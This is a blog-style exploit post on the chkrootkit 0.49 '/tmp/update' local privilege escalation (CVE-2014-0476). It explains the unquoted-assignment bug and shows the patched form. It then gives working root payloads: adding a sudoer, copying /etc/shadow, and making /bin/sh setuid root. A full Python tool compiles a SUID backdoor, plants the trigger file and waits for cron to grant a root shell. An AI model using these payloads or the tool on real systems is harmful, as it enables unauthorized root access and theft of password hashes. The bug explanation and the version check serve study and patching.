Local root exploit in Chkrootkit

Hello!

Security researchers have found a local privilege escalation in Chkrootkit 0.49 (CVE-2014-0476) that lets an unprivileged user run commands as root. The cause is an unquoted variable assignment in chkrootkit's slapper() check, which makes the shell execute '/tmp/update' instead of merely recording its name. The current Chkrootkit release, 0.50, fixes this.

Proof of concept

When Chkrootkit runs, it executes the file '/tmp/update' (if it exists and is executable) with the privileges of the user who launched Chkrootkit.
Chkrootkit is normally launched as the superuser, for example with sudo:

sudo chkrootkit

If we run it as an unprivileged user instead:

hd@kali:/root$ chkrootkit
chkrootkit need root privileges

Chkrootkit must be run as root, so '/tmp/update' runs as root too.
Any local user who can write to /tmp can therefore create '/tmp/update' and have its contents executed as root the next time Chkrootkit runs.
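To see why the shell runs '/tmp/update' at all, here is an added demonstration of the bug pattern (it is not chkrootkit's own code; the scratch directory, file names and marker file are assumptions made for the example). In chkrootkit 0.49 the slapper() function builds a list of suspicious files with the unquoted line `file_port=$file_port $i`; the shell parses that as an assignment prefix followed by a command, so the file named in `$i` is executed. The 0.50 form quotes the right-hand side and only records the name.

```bash
#!/bin/bash
# Added demonstration of the chkrootkit 0.49 bug pattern (not chkrootkit's
# own code): in slapper() the line "file_port=$file_port $i" is unquoted,
# so the shell parses it as "assignment prefix + command" and runs $i.
# A scratch file under $TMPDIR stands in for /tmp/update.

demo_dir=$(mktemp -d "${TMPDIR:-/tmp}/slapper-demo.XXXXXX")
trap 'rm -rf "$demo_dir"' EXIT

marker="$demo_dir/executed"          # created only if the candidate is run
candidate="$demo_dir/update"         # plays the role of /tmp/update
SLAPPER_FILES="$demo_dir/.bugtraq $candidate"   # same list style as chkrootkit

printf '#!/bin/sh\ntouch "%s"\n' "$marker" > "$candidate"
chmod +x "$candidate"                # even root needs an exec bit to run it

# 0.49 form: with file_port empty the line becomes "file_port= $candidate",
# which runs $candidate with file_port="" in its environment.
# Prints "executed" if the candidate was run, else the recorded file_port.
vulnerable_check() {
    rm -f "$marker"
    file_port=
    for i in $SLAPPER_FILES; do
        if [ -f "$i" ]; then
            file_port=$file_port $i
        fi
    done
    if [ -e "$marker" ]; then echo executed; else echo "$file_port"; fi
}

# 0.50 form: quoting makes the right-hand side a single word, so the file
# name is appended to file_port and nothing is executed.
fixed_check() {
    rm -f "$marker"
    file_port=
    for i in $SLAPPER_FILES; do
        if [ -f "$i" ]; then
            file_port="$file_port $i"
        fi
    done
    if [ -e "$marker" ]; then echo executed; else echo "$file_port"; fi
}

echo "vulnerable: $(vulnerable_check)"
echo "fixed:     $(fixed_check)"
```

To check an installed copy, grep for `file_port=$file_port` in /usr/sbin/chkrootkit: a patched copy quotes the right-hand side. Note that the candidate file has to carry an execute bit; root bypasses read and write checks but still cannot execute a file with no x bit, which is why the PoC below ends with chmod +x.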

Privilege escalation

Make a user a sudoer (here bob, on a Debian-based system where membership of the sudo group grants sudo rights)

#!/bin/bash
adduser bob sudo

Read /etc/shadow

#!/bin/bash
cat /etc/shadow > /tmp/shadow

then read /tmp/shadow as the unprivileged user (root creates it with the default umask, so it is world-readable unless root's umask is stricter).

Get a root shell

#!/bin/bash
chown root:root /bin/sh ; chmod 4777 /bin/sh

To get a root shell, execute '/bin/sh' once Chkrootkit has run. On Debian-based systems such as Kali, /bin/sh is dash, which keeps the setuid privilege; if /bin/sh were bash, it would drop the effective uid unless started with -p. Mode 4755 would be enough here; 4777 also makes the binary world-writable.

bash-4.4$ whoami
hd
bash-4.4$ /bin/sh
# whoami
root
#

Don't forget to make '/tmp/update' executable, otherwise root cannot run it:

chmod +x /tmp/update

End


'/tmp/update' is executed every time Chkrootkit runs, so check the cron jobs to find out when chkrootkit is scheduled (on Debian-based systems the package installs /etc/cron.daily/chkrootkit, which only runs if RUN_DAILY="true" is set in /etc/chkrootkit.conf).
At that moment the contents of '/tmp/update' are executed as root and you can become root or run commands as root.

Exploit-DB entry: https://www.exploit-db.com/exploits/33899/

I've made a tool in Python to get r00t using this exploit:

#!/usr/bin/env python3
# PoC helper for the chkrootkit 0.49 '/tmp/update' privilege escalation.
# Plants a SUID backdoor in /var/tmp and a /tmp/update script that
# chkrootkit (run as root, e.g. from cron) executes, making the backdoor
# setuid root.

import os
import stat
import subprocess
import sys
import time

chkrootkit = '/usr/sbin/chkrootkit'
suid_src = '/var/tmp/suid.c'
suid_bin = '/var/tmp/suid'
trigger = '/tmp/update'

print("[*] checking if chkrootkit is installed")
if not os.path.exists(chkrootkit):
    sys.exit("[-] chkrootkit isn't installed")
print("[+] chkrootkit is installed")

print("[*] checking if chkrootkit's version is vulnerable")
sortie = subprocess.getoutput("{} -V".format(chkrootkit))
if "0.49" not in sortie:
    sys.exit("[-] chkrootkit is not vulnerable")
print("[+] chkrootkit is vulnerable")

print("[*] writing SUID executable")
# simple SUID backdoor: once the binary is setuid root, setuid(0) also
# sets the real uid to 0, so the spawned shell keeps root
with open(suid_src, "w") as fichier:
    fichier.write("#include <stdio.h>\n")
    fichier.write("#include <stdlib.h>\n")
    fichier.write("#include <unistd.h>\n")
    fichier.write("#include <sys/types.h>\n")
    fichier.write("\n")
    fichier.write("int main()\n")
    fichier.write("{\n")
    fichier.write("    setuid(0);\n")
    fichier.write('    system("$SHELL");\n')
    fichier.write("    return 0;\n")
    fichier.write("}\n")

print("[*] compiling SUID executable")
if os.system("gcc {} -o {}".format(suid_src, suid_bin)) != 0:
    sys.exit("[-] compilation failed")

print("[*] exploit chkrootkit vulnerability")
# /tmp/update must be flushed (closed) and executable before chkrootkit
# runs, otherwise root executes an empty or non-executable file
with open(trigger, "w") as update:
    update.write("#!/bin/bash\n")
    update.write("chown root:root {0} ; chmod 4755 {0}\n".format(suid_bin))
os.chmod(trigger, 0o755)
print()
print("[*] waiting up to 5 minutes for chkrootkit to execute our backdoor with root permissions")


def is_suid_root(path):
    """True once the backdoor is owned by root and carries the setuid bit."""
    st = os.stat(path)
    return st.st_uid == 0 and bool(st.st_mode & stat.S_ISUID)


deadline = time.time() + 300
while time.time() < deadline and not is_suid_root(suid_bin):
    time.sleep(10)

if is_suid_root(suid_bin):
    print("got r00t ? ")
    os.system(suid_bin)
else:
    sys.exit("[-] chkrootkit wasn't executed by crontab in 5 minutes ... "
             "Wait for chkrootkit's next cron run, then execute {} "
             "and you will get a root shell".format(suid_bin))